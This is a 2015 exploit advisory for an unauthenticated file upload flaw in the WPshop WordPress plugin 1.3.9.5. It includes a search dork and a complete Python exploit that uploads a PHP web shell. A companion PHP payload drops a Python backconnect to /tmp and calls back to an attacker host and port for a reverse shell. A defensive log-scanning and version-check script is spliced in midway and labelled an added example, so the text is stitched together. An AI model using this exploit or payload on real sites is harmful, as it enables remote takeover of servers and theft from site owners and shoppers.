
WordPress WPshop eCommerce 1.3.9.5 Arbitrary File Upload

Friday, 04 December 2015

#-Title: WordPress WPshop eCommerce 1.3.9.5 Shell Upload
#-Author: g0blin
#-Lab : research[dot]g0blin[dot]co[dot]uk
#-Date: 2015-03-02
#-Link Download : wordpress.org/plugins/wpshop/
#-Google Dork: inurl:wp-content/themes/wpshop/
#-Tested on : Linux
#-Fixed in : 1.3.9.6
////////////////////////////////////////////////////////////////////////////////////////////

Bug information:

CVSS Score : 6.4
CVSS Vector : CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope : remote
Authorization Required : None

When Vulnerable : Blank

Description : 
The script "includes/ajax.php" allows anonymous (unauthenticated) users to execute various actions. The action name is supplied in the "elementCode" parameter. One of these actions, "ajaxUpload", allows upload of arbitrary files because the user-supplied input is not sanitised.


Solution:

Update to version 1.3.9.6.
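Two defender-side checks that follow from the description and the fix above, written as an added example (not code from the advisory, the plugin or its author): a version comparison against the fixed release 1.3.9.6, and a scan of combined-format access log lines for requests to the vulnerable endpoint (includes/ajax.php with elementCode=ajaxUpload). The log lines, IP addresses and the action name "otherAction" are constructed for this example; the endpoint path is the one the advisory names.

```python
#!/usr/bin/env python3
"""Detection helpers for the WPshop ajaxUpload arbitrary file upload.

Added example, not part of the original advisory or the plugin.
  1. is_vulnerable_version(): installed version older than the fixed 1.3.9.6?
  2. find_ajax_upload_hits(): report requests that reach the vulnerable
     endpoint in Apache/nginx combined-format access logs.
"""
import re
from urllib.parse import parse_qs, urlsplit

FIXED_VERSION = "1.3.9.6"  # "Fixed in" version from the advisory
# Endpoint named in the advisory; the plugin lives under wp-content/plugins/wpshop/
VULN_PATH = "/wp-content/plugins/wpshop/includes/ajax.php"
VULN_ACTION = "ajaxUpload"

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_version(version):
    """'1.3.9.5' -> (1, 3, 9, 5); tuples compare component-wise."""
    return tuple(int(part) for part in version.strip().split("."))


def is_vulnerable_version(installed):
    """True when the installed WPshop release predates the fix (1.3.9.6)."""
    return parse_version(installed) < parse_version(FIXED_VERSION)


def find_ajax_upload_hits(lines):
    """Return one record per request to includes/ajax.php?elementCode=ajaxUpload.

    Both GET and POST are reported: a POST is the upload itself, a GET may be
    someone probing whether the endpoint answers for anonymous clients.
    """
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        url = urlsplit(match.group("path"))
        if not url.path.endswith(VULN_PATH):
            continue
        action = parse_qs(url.query).get("elementCode", [""])[0]
        if action != VULN_ACTION:
            continue
        hits.append({
            "ip": match.group("ip"),
            "method": match.group("method"),
            "status": int(match.group("status")),
            "timestamp": match.group("ts"),
        })
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
# Only the first line touches the vulnerable action; the third hits ajax.php
# with a different, made-up action name and must not be reported.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Mar/2015:10:15:01 +0000] '
    '"POST /wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload HTTP/1.1" '
    '200 87 "-" "python-requests/2.5.1"',
    '192.0.2.9 - - [02/Mar/2015:10:16:30 +0000] '
    '"GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [02/Mar/2015:10:17:11 +0000] '
    '"GET /wp-content/plugins/wpshop/includes/ajax.php?elementCode=otherAction HTTP/1.1" '
    '200 120 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]

if __name__ == "__main__":
    for version in ("1.3.9.5", "1.3.9.6"):
        state = "VULNERABLE" if is_vulnerable_version(version) else "fixed"
        print("WPshop %s: %s" % (version, state))
    for hit in find_ajax_upload_hits(SAMPLE_LOG):
        print("ajaxUpload request from %(ip)s (%(method)s, HTTP %(status)s) at %(timestamp)s" % hit)
```

The version check treats a shorter tuple as older, so "1.3.9" compares as vulnerable and "1.4" as fixed, which is what the advisory's "Fixed in 1.3.9.6" implies. The log scan deliberately matches on the parsed path and query rather than a substring, so a request that hides the action in a differently encoded query string still has to decode to elementCode=ajaxUpload before it is reported, and a POST with a 200 response from a non-browser user agent is the pattern worth alerting on.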

-- Proof Of Concept --

Requires : Python (file.py)
How to use :
python Name-script.py http://web.com back_python.php (your-ip) 1337
- Example :
python wpshop.py http://web.com back_python.php 192.168.2.116 1337

Script wpshop.py : 
#!/usr/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150427.1
# Licence: WTFPL - wtfpl.net
import requests
import sys
__version__ = "20150427.1"

def banner():
    print """\x1b[1;32m
    (ASCII-art banner not preserved in this copy)
    Exploit for WPShop Ecommerce, WPVDB-7830 Version: %s\x1b[0m""" %(__version__)

def php_encoder(php):
    f = open(php, "r").read()
    f = f.replace("<?php", "")
    f = f.replace("?>", "")
    encoded = f.encode('base64')
    encoded = encoded.replace("\n", "")
    encoded = encoded.strip()
    code = "eval(base64_decode('%s'));" %(encoded)
    return code

def shell_upload(url):
    target_url = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload"
    try:
        print "\x1b[1;32m{+} Using target URL of: %s\x1b[0m" %(target_url)
        r = requests.post(url=target_url, files={"wpshop_file":("test.php", "<?php @assert(filter_input(0,woot,516)); ?>")})
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        return r.text.strip()
    else:
        sys.exit("\x1b[1;31m{-} Something fucked up... Our shell was not uploaded :/\x1b[0m")


def spawn_backconnect(shell_url, payload, cb_host, cb_port):
    cookies = {'host': cb_host, 'port': cb_port}
    data = {'woot': payload}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'}
    try:
        print "\x1b[1;32m{*} Sending our payload...\x1b[0m"
        r = requests.post(url=shell_url, data=data, headers=headers, verify=False, cookies=cookies)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))
    if r.text:
        print r.text

def pop_shell(target, code, cb_host, cb_port):
    shell_url = shell_upload(url=target)
    print "\x1b[1;32m{+} Our shell is at: %s\x1b[0m" %(shell_url)
    try:
        print "\x1b[1;36m{*} Sending Backconnect to %s:%s...\x1b[0m" %(cb_host, cb_port)
        spawn_backconnect(shell_url=shell_url, payload=code, cb_host=cb_host, cb_port=cb_port)
    except Exception, e:
        sys.exit("\x1b[1;31m{-} Exception hit, printing stack trace...\n%s\x1b[0m" %(str(e)))

def main(args):
    banner()
    if len(args) != 5:
        sys.exit("use: %s http://host/wordpress_baseurl/ <payload.php> <cb_host> <cb_port>" %(args[0]))
    pop_shell(target=args[1], code=php_encoder(args[2]), cb_host=args[3], cb_port=args[4])

if __name__ == "__main__":
    main(args=sys.argv)


Script back_python.php : 

<?php
$cbhost = $_COOKIE['host'];
$cbport = $_COOKIE['port'];
echo "{+} Using ".$cbhost.":".$cbport." as callback...\n{+} Dropping shell...\n";
$shell =
"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";
$x = fopen("/tmp/x", "w+");
fwrite($x, base64_decode($shell));
fclose($x);
echo "{+} Shell dropped... Triggering...\n";
system("python /tmp/x ".$cbhost." ".$cbport);
die('{+} got shell?'); // payload should have rm'd itself
?>


Result Shell : Here !!
